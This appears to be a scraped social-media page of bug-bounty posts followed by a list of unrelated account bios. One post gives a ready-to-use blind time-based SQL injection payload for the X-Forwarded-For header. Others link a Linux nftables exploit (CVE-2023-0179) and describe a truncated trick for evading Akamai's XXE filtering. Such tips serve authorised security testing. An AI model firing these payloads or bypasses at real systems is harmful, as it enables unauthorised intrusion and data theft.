I found 2 Blind time-based SQL Injections in X-Forwarded-For: header just using Burp Intruder. Made a list of 500+ HTTP request and tested one by one for 3+ hours, here is the result..
X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z
#BugBounty
Needle (CVE-2023-0179) exploit
This repository contains the exploit for my recently discovered vulnerability in the nftables subsystem that was assigned CVE-2023-0179
github.com/H4K6/CVE-2023-…
You can bypass Akamai WAF's XXE filters by HTML encoding the SYSTEM entity within a payload like this:
<!DOCTYPE foo [<!ENTITY % a "<! ... omitted ...
neat trick! used this today.
dns.toys is a DNS server that takes creative liberties with the DNS protocol to offer handy Linux /macOS / Unix utilities and services that are easily accessible via CLI:
Example: Find weather in NYC:
dig newyork\.weather @dns.toys
Time:
dig mumbai.time @dns.toys
18K Followers 222 FollowingAnda boleh melakukan segala-galanya dari syurga ke bumi, wanita kecil!!
If you have any questions, please contact me
https://t.co/MkzsavUU9V
233K Followers 1K FollowingCofounder @hackinghub_io | Advisor @CaidoIO. I hack companies and make content about it. #NahamCon organizer. ex @hacker0x01🇮🇷
35K Followers 968 FollowingManaging Director - Grossman Ventures. CTO of Evidence. Defender of others' privacy, Author of AI’s Best Friend, Advisor, often found joking.
4.2M Followers 1K FollowingESPN’s official NFL coverage.
Sign up for ESPN! https://t.co/0jPmivzjz3
Questions about your subscription? https://t.co/gfNBR08XMi
460K Followers 1K FollowingFiverr is a global platform connecting businesses with freelance talent in the simplest way possible. Need help? Tweet us at @fiverrsupport
113 Followers 478 FollowingDigital Marketer | Social Media Marketer Expert 💹 | Content Creator | I share valuable information for digital marketing, AI tools & online earning. Follow me!
93K Followers 26K FollowingHuman-Powered Collaboration, Driven by AI ✨ Join 3M freelancers & 1M businesses. Post business projects and pay by the hour.
352K Followers 57 FollowingWork, but smarter. Find AI-enabled freelancers & new opportunities, all in one place. ✨ Need support? We got you 👉 https://t.co/6GvJOhglpE
14K Followers 1K FollowingBritish High Commissioner to India. Formerly National Cyber Security Centre, NI Office and DFID. Retweets for interest not endorsement.
181K Followers 1K FollowingThe National Cybersecurity Alliance is a nonprofit that empowers people to use technology safely & securely. Co-leads Cybersecurity Awareness Month
325K Followers 119 FollowingEmpowering the world to fight cyber threats with indispensable cybersecurity skills and resources. Build the path to a secure future with OffSec.
22K Followers 2K FollowingGNS3 is a graphical network simulator that allows simulation of complex networks. Stay tuned on new releases, tutorials and news.
95K Followers 2K FollowingHacker, marketer. I manage socials and produce amazing technical blogs for cybersecurity orgs. Founder of @hacker_content and @haksecio
247K Followers 3K FollowingStart here. Go anywhere. Learn with Cisco accelerates your success, including #CCNA #CCNP #CCIE #CCDE Specialist & #DevNet. Use #CiscoCert to join conversation.
38K Followers 432 FollowingHuman Hacking or Social Engineering is about learning how to communicate with intent. Check out the new book at https://t.co/B4GdVzCz0O
16K Followers 606 FollowingThreats to information security consistently focus their attacks on company employees. Discover how our Managed Services keep your company protected.
324K Followers 3K FollowingThe only official HackerOne Twitter account.
A global leader in offensive security solutions. #HackForGood #togetherwehitharder